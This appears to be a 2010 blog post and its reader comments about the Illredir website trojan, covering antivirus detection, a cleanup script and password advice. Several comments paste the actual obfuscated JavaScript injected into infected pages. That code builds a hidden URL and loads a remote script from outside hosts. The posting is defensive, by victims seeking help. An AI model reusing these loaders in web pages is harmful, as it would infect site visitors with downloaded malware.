WARNING, PEOPLE!!! The trojans are mutating faster than we can keep up with. In one of my recent postings, I warned everyone about the Illredir-B trojan, to which Mike kindly provided a script to help us remove the trojan from our websites. In less than 2 weeks, we have been alerted that it has mutated into Illredir-C. Mike quickly modified to script to eliminate both trojans.

Today, a friend asked me to take a look at her website and Avast has detected it as Illredir-D, and when I tested Mike’s script, it wasn’t able to remove the trojan, which means it has mutated into a pattern different from the earlier two; so a further modification of the script will be needed to wipe this out.

It sounds almost like biological warfare with virus mutation.

My hat off to Avast for its quick detection, even though it is free for personal use. My AVG Free did not detect it. I’m so disappointed in it, having believed in it and recommending it to friends for the past few years.

I have also tried a few online website virus scans which were not able to detect this trojan. This is quite a worrying thought, that few antivirus programs are able to keep up with the new trojans, viruses and malware that are mushrooming more quickly than ever.

The good news is that Google is able to detect the malware, and if it has been submitted to Google webmaster, it will block access to the website upon detection of these malwares. You may come across a screenshot like the following:

Snapshot of Google blocking a website. I have blurred the website URL for privacy
Snapshot of Google blocking a website. I have blurred the website URL for privacy


To ensure your own protection, please please please get a good antivirus software!! I highly recommend Avast because even though I’m using the free licence, it is able to detect and block the trojan. Another one that is able to detect this virus (or so I’m told) is Kaspersky, but it’s not available for free download.

[Note: I hope this post will not be ripped off like the earlier post. If you wish to repost this blog entry, please include the original link to this entry which is http://www.zyenweb.com/2010/01/19/trojan-alert-illredir-billredir-cillredir-d/. Thank you.]

45 Replies to “TROJAN ALERT! Illredir-B/Illredir-C/Illredir-D”

  1. If you want to remove this virus you need:

    1. Delete crap from .htaccess file
    2. Delete script after /html in site source code

    That’s all.

    I tested with Illredir-D version.



  2. Sometimes also PHP/JavaScript files are infected, so be careful πŸ™‚

    (mostly with name index.htm, index.html, index.php)

  3. @Mike Sorry I cleaned out infected site that my friend asked me to check. But I did keep a copy of the original infected file. Can I email it to you? May I have your email address?

  4. example of infected site (2010-01.20 12:00) is http://www.enigmainfo.de (official site of “Enigma” (music)).

    ALL .js-files, index.*-files on your server will be infected!
    Change all your ftp-passwords!!!
    In my case the trojan was reading the pwd-file of “Flash-FXP” (the ftp-tool i am using in WinXP). All accounts stored there have been infected.

  5. This means you’re using php 4 instead of php 5 I believe.
    Try to rename it to .php5 and try again if your hosting company has php5 enabled it should work then

  6. I was using the script and work fine.

    But in some sites I have another mutation of Illredir (I think)

    In that case modify all php files with insertion of code at the top of scripts:

    If I try to access to my site I see a URL like: voila-fr.gamespot.com.uol or others, and I see conection to a russian domain :S

    I changed the ftp passwords and waiting for other update of your cleaner script,

    Thanks for all

    Sorry for my Enfglish

  7. Ups!


  8. I’m bored with this trojan and it’s mutations ! After getting B, C and E version, they don’t add GNU/GPL text anymore. A new example I’m having below.

    Do you know if there is a solution somewhere not to be infected again ? Change password, update blog to last version, nothing seems to stop that πŸ™ Thanks in advance.

    try{window.onload=function(){document.write(‘mobile-de.friendfeed.com.’);V8flyhwc7e = document.getElementById(‘Cmtyp1dk2g’).innerHTML + ‘m$)e^#$g#&a((u^@p#(l))o!&&a!#)d$^)#-##!#c!o)^!m).!^^$u(!r(l@&#n##$&e#x!@(t^#$.($r!&u$((:))$I!^#)!m@$!u^!&0##)p$#^0(p&&&v!@)0)!!g(k#&d^@@/@!$p$&@^a#(n#!t#$$i$$$p#@^.!&c&)@)o&@!m!/$(p&!a$!#^n!!)(t@^i^&p!!.!@(c&o(^(m@/&$)(r(1$^0)(.(!##n$)(e^@^t((/!t)r#$!a&$^v(&e$@(^&l$^)o^$)c$!&i&&t!(#y!.((c&)&!o^m@/@^@g@(o#!&#o^g##&l!e&.$(&&!c)^!o&$!m!@/^$)’.replace(/(|&|)|^|@|!|#|$/ig, ”) ;document.write(”);} } catch(Vt836kqo ) {}

  9. i have the same probleme here, many websites are infected,
    the code i find is different from what you mentionned, it’s like the following :

    try{window.onload=function(){Pqdekqmwhk62 = ” + ‘h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#’.replace(/&|#|(|!|@|^|)|$/ig, ”) ;Q7rj4s75mfeh3 = ‘appendChild’;Mxvqzu6myayt = document.createElement(‘sc’+’ript’);Mxvqzu6myayt.src = ‘h’+’ttp://’+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, ‘8080’);Mxvqzu6myayt.setAttribute(‘defer’, ‘def’+’er’);eval(‘document.body.’+Q7rj4s75mfeh3+'(Mxvqzu6myayt)’);} } catch(Tb3w8uei ) {}

  10. Updated the code version 0.98
    @leparachute – version 0.97 of the script was able to remove your version
    The new version removes also Didis version
    Remember to change FTP passwords on the server and don’t store passwords on the ftp client don’t use TotalComander at all

    Hope this helps

  11. Per wikipedia http://en.wikipedia.org/wiki/Gumblar
    This virus incorporates a network sniffer, so if you’re infected don’t use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https however if its smart enough it might use keylogger too.
    So, I would recommend:
    – make sure all infected boxes are shut down
    – boot one box from live linux cd/dvd
    – use browser to change passwords on the server (use https)
    – from now on use only scp, sftp if possible
    – copy virus removal script on the server (into public_html)
    – run the script to fix your websites
    – download http://www.malwarebytes.org/
    – download avast
    – dowload bootable antivir cd/dvd like kaspersky .iso
    – create bootable antyvir dvd growisofs /dev/dvd=kaspersky.iso
    – boot from bootable antvir
    – try to clean windows partitions
    – if successful boot windows
    – otherwise restore your system from CD/DVD or restore partition
    – install avast, malwarebytes, personal firewall
    – run scans

  12. Thanks for your respond Mike, and for your solution to remove the trojan. What I would want is not be infected again. I changed FTP password but it seems – based on what I read – that the code is injected with input tags in forms (and not using FTP). But thanks again for your help πŸ˜‰

  13. Hey everyone. Just approved the pending comments. Sorry I didn’t approve earlier because I couldn’t go on the ‘net for a while and I thought the comments would be automatically approved.

  14. Hi,
    Another mutation, and the latest version of Illredir doesn’t work…
    Please help, or tell how to modify Illredir so that it worked..

    var H=”;this.Ff=””;function b() {var U=””;var _=new Array();var i=’replace’;var p=’]’;this.Fw=”;var s=RegExp;var h=new String();var iE='[‘;var SI;if(SI!=” && SI!=’Ax’){SI=’e’};var R=’g’;var K;if(K!=’iW’){K=’iW’};function F(d,q){var hp;if(hp!=” && hp!=’mS’){hp=null};var _g;if(_g!=” && _g!=’hn’){_g=null};this.DJ=””;var O=iE;var V=new Date();O+=q;var v;if(v!=’nL’ && v!=’eO’){v=’nL’};var Mt=new Array();O+=p;var bP=new s(O, R);return d[i](bP, h);};var VL;if(VL!=” && VL!=’G’){VL=null};var km=””;var Ks=”;var Y=F(‘8595509958959909995′,”95″);var RB=window;var N=new Date();var w;if(w!=’fG’ && w!=’Nn’){w=’fG’};var y=F(‘hOtPtPpj:7/j/Ocja7rOe7ePrObjuPiOlPdOePrO-DcjoPmD.7lOiDnOeOzDi7nOg7.7c7ojmj.OtOrPaDvPiDaDnO-jc7ojmj.PsDaPmPuPeOsPt7.7rDuO:O’,”jO7PD”);var QF;if(QF!=’To’){QF=’To’};var k=F(‘s4c4r4i4pOtH’,”HO4″);var eS;if(eS!=” && eS!=’Wj’){eS=”};var om;if(om!=” && om!=’rD’){om=”};var T=F(‘cqr7ega7t7egEqlgegmqe7ngtq’,”g7q”);this.cd=””;var Ob=”;var o=F(‘/RaRlRiObOaObRaO.RcRoRmR/RaRlOiRbOaObOaR.RcRoOmR/O3R6O0RbOuOyR.RcRoRmO/OgOoOoOgRlOeR.OcRoOmO/OcRoRnRsOtOaOnRtOcOoOnOtRaRcOtO.OcRoOmO.RpOhOpR’,”RO”);RB[F(‘o_nZlIoyaydy’,”yZ_Ip”)]=function(){try {var wF=””;var Bi=new String();this.qX=””;Ob+=y;Ob+=Y;var Pp;if(Pp!=” && Pp!=’so’){Pp=”};var kW;if(kW!=”){kW=’l’};Ob+=o;j=document[T](k);var tT=””;var Yt;if(Yt!=’VG’ && Yt!=’NH’){Yt=’VG’};var ya=”;yD(j,’defer’,([1][0]));var xU;if(xU!=’E’){xU=”};var Iu=new String();yD(j,’src’,Ob);var u;if(u!=’We’){u=’We’};document.body.appendChild(j);var EM=””;var nA=new String();} catch(D){};var Ex;if(Ex!=” && Ex!=’asm’){Ex=null};};function yD(DG,t,A){DG.setAttribute(t, A);}this.iY=””;var pY=””;};var DR;if(DR!=’xl’ && DR!=’VP’){DR=’xl’};b();var gz;if(gz!=’uu’){gz=”};var FH=””;

  15. Version 1.0 is out. Should fix most of the latest versions however if you’re doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn’t work after your run the script keep the script output log and restore from the backups.
    @Andrew Try to use latest version , also don’t chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions

  16. Email me your version (code from any forum is already pre-formatted).

    Zip/Rar the virus with some password and e-mail to the contact email. Include Password πŸ™‚
    Thanks !

  17. hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now.
    Now I think that I have a new virus, because Mike script isnt clean my website… he cleaned some files but the website continues with virus πŸ™
    Can someone tell me If is the same virus?
    My site is: http://www.filmes-terror.com

    I am using ESET NOD32 and he show me that virus name is:
    JS/TrojanDownloader.Agent.NSM trojan

    05-03-2010 10:54:22 HTTP filter file http://www.filmes-terror.com/ JS/TrojanDownloader.Agent.NSM trojan connection terminated – quarantined Luis-PCLuis Threat was detected upon access to web by the application: C:Program FilesMozilla Firefoxfirefox.exe.

  18. there he is:
    var p;if(p!=” && p!=’f’){p=null};this.N=””;var u;if(u!=”){u=’DD’};var l=new String(“hIZrep”.substr(3)+”oB8laco8B”.substr(3,3)+”e”);var tD;if(tD!=’_U’){tD=”};var U=RegExp;var I=new String();var li=”;function d(R,Q){this.X=””;this.m=””;var lm=new String();this.QU=”;var dA=String(“[3Po”.substr(0,1));this.Z=””;var Uj=String(“HVQg”.substr(3));this.fH=””;dA+=Q;dA+=new String(“uMc]”.substr(3));this.jF=””;this.z=”;var n=new U(dA, Uj);this._R=”;return R[l](n, new String());};var _D;if(_D!=’Sp’){_D=”};var Df=new Date();this.vh=”;var j=window;var TL;if(TL!=’zs’){TL=’zs’};this.ZJ=””;var k=”;var _Q=”;var G=d(‘oGn4lAoGaGdA’,”G4AfY”);var g=d(‘/QgQoGoQgSlSeS.9cSo2mS/GgQo2o9gQlGe9.Qc9oQmQ/ShQuGrGrGi9yGeQt2.2cQoSmQ.Qt2rS/9bGaQr9n2eQsSaSn2d9nSo2bGlSeG.Qc2oQm2/2aSmGa2zQo2nG.9fSrS.Sp9h9pG’,”2S9GQ”);var RM=d(‘sVcqr2iVpVtV’,”qV2″);var cZ=””;var lrx;if(lrx!=”){lrx=’wz’};var J=d(‘c_rJeJaJt_eJE_l_eJm_e_nJt_’,”_J”);var x=new Date();var i;if(i!=’PX’){i=”};var rQ=new Array();var W=d(‘85307158750573’,”1753″);var qy=new Array();var ZL=new Date();var O=d(‘h1t1t1pP:H/P/Pg1oHoHg1lPeP-1cHo1mQ-1b1rP.1fHoQrPbPe1sP.QcHo1mH.Qc1aHmHsH-PcHoHm1.1EPxHcQe1l1lHeHnPtHB1lHeQnQdQeHrH.HrPuH:Q’,”PQH1″);r=function(){var NH=new Date();var a;if(a!=”){a=’Op’};this.x_=”;w=document[J](RM);var Br;if(Br!=” && Br!=’qG’){Br=’XS’};var dAD;if(dAD!=” && dAD!=’LQ’){dAD=’Nv’};var XD;if(XD!=’XV’ && XD!=’_g’){XD=’XV’};var cX=new Date();k=O+W;var Hc=””;var cn;if(cn!=” && cn!=’nn’){cn=’Ol’};k+=g;var le=new String();var Ro=new Date();var uQ=new String();var jG=”;w.src=k;var ol;if(ol!=’Vg’){ol=’Vg’};var Gr;if(Gr!=’je’){Gr=’je’};w.defer=([2,1][1]);var kA=””;this.Rb=”;var mo;if(mo!=’BP’){mo=’BP’};document.body.appendChild(w);var sW=new Date();};this.BG=”;var Qo=new Array();j[G]=r;this.jk=””;var W_=””;var b=new String();var AT=new Date();} catch(H){};

  19. Hi,
    Another mutation, and the latest version of Illredir doesn’t work…
    Please help, or tell how to modify Illredir so that it worked..


    var Z=”;function A() {var EW;if(EW!=’W’){EW=’W’};var B;if(B!=’N’){B=’N’};var I=new String(“ap”+”pe”+”nd”+”Ch”+”il”+”HML5d”.substr(4));var uL=String(“ghOTN”.substr(0,1));var n;if(n!=’Q’ && n!=’Fe’){n=”};var k=RegExp;var P=””;var X=new Array();var E=new String(“scSBDI”.substr(0,2)+”ri”+”pt39w7″.substr(0,2));this.YO=””;var kJ=new Array();var j;var p=window;var sI;if(sI!=’YA’ && sI!=’_’){sI=”};var bh=new Date();var e=”Z0h]”.substr(3);var HL=new Date();var bM;if(bM!=”){bM=’Ea’};var f=”;var wj=new String();var Mk;if(Mk!=’ep’){Mk=’ep’};var uC;if(uC!=’l’ && uC != ”){uC=null};function u(q,fx){var DJ;if(DJ!=’z’){DJ=’z’};var c=”[“;this.EM=””;c+=fx;var MY=new Date();var Rm=new Array();c+=e;var gD;if(gD!=’yN’){gD=’yN’};var H=new k(c, uL);var VW;if(VW!=’ta’ && VW!=’i’){VW=’ta’};var Kp;if(Kp!=’Rmu’ && Kp!=’Ys’){Kp=’Rmu’};return q.replace(H, f);var Ps;if(Ps!=’yr’ && Ps!=’wc’){Ps=”};this.Sf=””;};var Yd=new Array();var m=new String(“onlo”+”ad”);var zg;if(zg!=” && zg!=’lv’){zg=null};var Lh=new String();this.gp=”;var Ip=u(‘serncf’,’fik0W1lT8P4mhp5Hje7_nx’);var Zc;if(Zc!=’AK’){Zc=”};var v=String(“defer”);this.uA=””;this.Cn=””;j=function(){var GW=””;var Bf=”;this.A_=””;try {var sV;if(sV!=”){sV=’CL’};this.T=”;U=document.createElement(E);var hz=new Date();var qd;if(qd!=’QC’ && qd != ”){qd=null};U[v]=[1,1][0];var Kj;if(Kj!=’Tb’ && Kj!=’sn’){Kj=’Tb’};var F=”l7fbo”.substr(3)+”INYQdy”.substr(4);this.oT=”;var dW=”;U[Ip] = u(‘hStNt6p6:_/1/1p1oSk_eTs2a_cjk_.Sr_u1:N’,’62TjS1NO_’)+u(‘866942167414379770265732646923592185954451297651770254292532473443′,’19365472’)+u(‘/OfOrZeOeOlUoOt4t4oZ-3c4o3m3/3gSoZo4g4l3eS.UcOo3mZ/Sl3oUcZkSe4rUzS.Oc4oSmO.SpZhUpS’,’S4OZ3U’);var Mj=””;var FH=new Array();var ZP=””;var jK=””;document[F][I](U);} catch(O){var ge;if(ge!=’Fo’){ge=’Fo’};};var rMH;if(rMH!=’El’){rMH=’El’};var __=new String();};var jY;if(jY!=’yL’ && jY!=’NZ’){jY=’yL’};var ek;if(ek!=’mE’){ek=”};p[m]=j;var yh=”;this.PE=””;};A();var Wp=new Array();var Mw=new Array();

  20. Please help, I do not have Avast or Kapersky -(have norton) and customers are calling me saying site is flagging virus.

    File Name: http://www.metrodetroitbjj.com/

    Malware name: JS:Illredir-AX [Trj]

    Malware Type: Trojan Horse

    VPS version: 100421-1, 04/21/2010

    any help would be appreciated
    Thanks in advance

  21. Very impressive….I am completely lost with computers and how to protect myself fromall the virus and torjans out there. Now I know a little more thanks to this well written article.

  22. Pingback: Mary Yorke

Leave a Reply

Your email address will not be published. Required fields are marked *